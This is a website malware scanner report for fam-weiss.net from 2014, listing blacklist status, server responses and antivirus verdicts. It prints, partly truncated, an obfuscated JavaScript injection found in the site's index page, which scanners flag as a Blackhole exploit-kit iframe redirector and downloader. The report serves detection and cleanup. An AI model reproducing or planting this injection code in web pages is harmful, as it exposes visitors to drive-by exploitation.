New scan:

Malware Scanner report for fam-weiss.net

Malicious/Suspicious/Total urls checked
1/0/3
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "fam-weiss.net" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=fam-weiss.net

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://fam-weiss.net/
HTTP/1.1 200 OK
Date: Sun, 12 Oct 2014 02:34:35 GMT
Accept-Ranges: bytes
ETag: "a68a67863aacd1:78d45e"
Server: Microsoft-IIS/6.0
Content-Length: 8412
Content-Location: http://fam-weiss.net/index.htm
Content-Type: text/html
Last-Modified: Sun, 14 Oct 2012 23:27:26 GMT
X-Powered-By: ASP.NET
clean
http://fam-weiss.net/index.htm
200 OK
Content-Length: 8412
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

b=new function(){return 2;};if(!+b)String.prototype.vqwfbeweb='h'+'arC';for(i in $='b4h3tbn34')if(i=='vqwfbeweb')m=$[i];try{new Object().wehweh();}catch(q){ss="";}try{window['e'+'v'+'al']('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd='e';if({}.asd==='e')a=document["c"+"r"+"e"+"a"+"t"+"e"+"T"+"e"+"x"+"t"+"N"+"o"+"d"+"e"]('321');if(a.data==321)h=-1*(d-d2);n=[-h+7,-h+7,-h+103,-h+100,-h+30,-h+38,-h+98,-h+109,-h+97,-h+115,-h+107,-h+99,
... 3003 bytes are skipped ...
42,-h+37,-h+47,-h+46,-h+37,-h+39,-h+57,-h+7,-h+7,-h+7,-h+98,-h+109,-h+97,-h+115,-h+107,-h+99,-h+108,-h+114,-h+44,-h+101,-h+99,-h+114,-h+67,-h+106,-h+99,-h+107,-h+99,-h+108,-h+114,-h+113,-h+64,-h+119,-h+82,-h+95,-h+101,-h+76,-h+95,-h+107,-h+99,-h+38,-h+37,-h+96,-h+109,-h+98,-h+119,-h+37,-h+39,-h+89,-h+46,-h+91,-h+44,-h+95,-h+110,-h+110,-h+99,-h+108,-h+98,-h+65,-h+102,-h+103,-h+106,-h+98,-h+38,-h+100,-h+39,-h+57,-h+7,-h+7,-h+123];for(i=0;i<n.length;i++)ss+=s(eval("n"+"[i"+"]"));if(!+b)eval(ss);

Antivirus reports:

AntiVir
JS/Agent.gkb
Avast
JS:Redirector-KK [Trj]
Antiy-AVL
Trojan/JS.Agent
Ikarus
Trojan.JS.IFrame
nProtect
Dropped:Trojan.JS.IFrame.ANM
K7AntiVirus
Riskware
TrendMicro-HouseCall
TROJ_GEN.RCBH1AH
Emsisoft
Dropped:Trojan.JS.IFrame.ANM (B)
Comodo
TrojWare.JS.TrojanDownloader.Agent.SCR
McAfee-GW-Edition
JS/Exploit-Blacole.da
DrWeb
JS.IFrame.151
TrendMicro
HEUR_HTJS.HDJSFN
Kaspersky
Trojan-Downloader.JS.Agent.gjd
Microsoft
Exploit:JS/Blacole.G
MicroWorld-eScan
Dropped:Trojan.JS.IFrame.ANM
Fortinet
JS/Iframe.W!tr
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.da
NANO-Antivirus
Trojan.Script.Agent.dtkph
F-Secure
Dropped:Trojan.JS.IFrame.ANM
F-Prot
JS/IFrame.HC.gen
AVG
HTML/Framer.FC
GData
Dropped:Trojan.JS.IFrame.ANM
Commtouch
JS/IFrame.HC.gen
BitDefender
Dropped:Trojan.JS.IFrame.ANM

http://fam-weiss.net/test404page.js
404 Not Found
Content-Length: 1635
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: fam-weiss.net

Result:
HTTP/1.1 200 OK
Date: Sun, 12 Oct 2014 02:34:35 GMT
Accept-Ranges: bytes
ETag: "a68a67863aacd1:78d45e"
Server: Microsoft-IIS/6.0
Content-Length: 8412
Content-Location: http://fam-weiss.net/index.htm
Content-Type: text/html
Last-Modified: Sun, 14 Oct 2012 23:27:26 GMT
X-Powered-By: ASP.NET

...8412 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: fam-weiss.net
Referer: http://www.google.com/search?q=fam-weiss.net

Result:
The result is similar to the first query. There are no suspicious redirects found.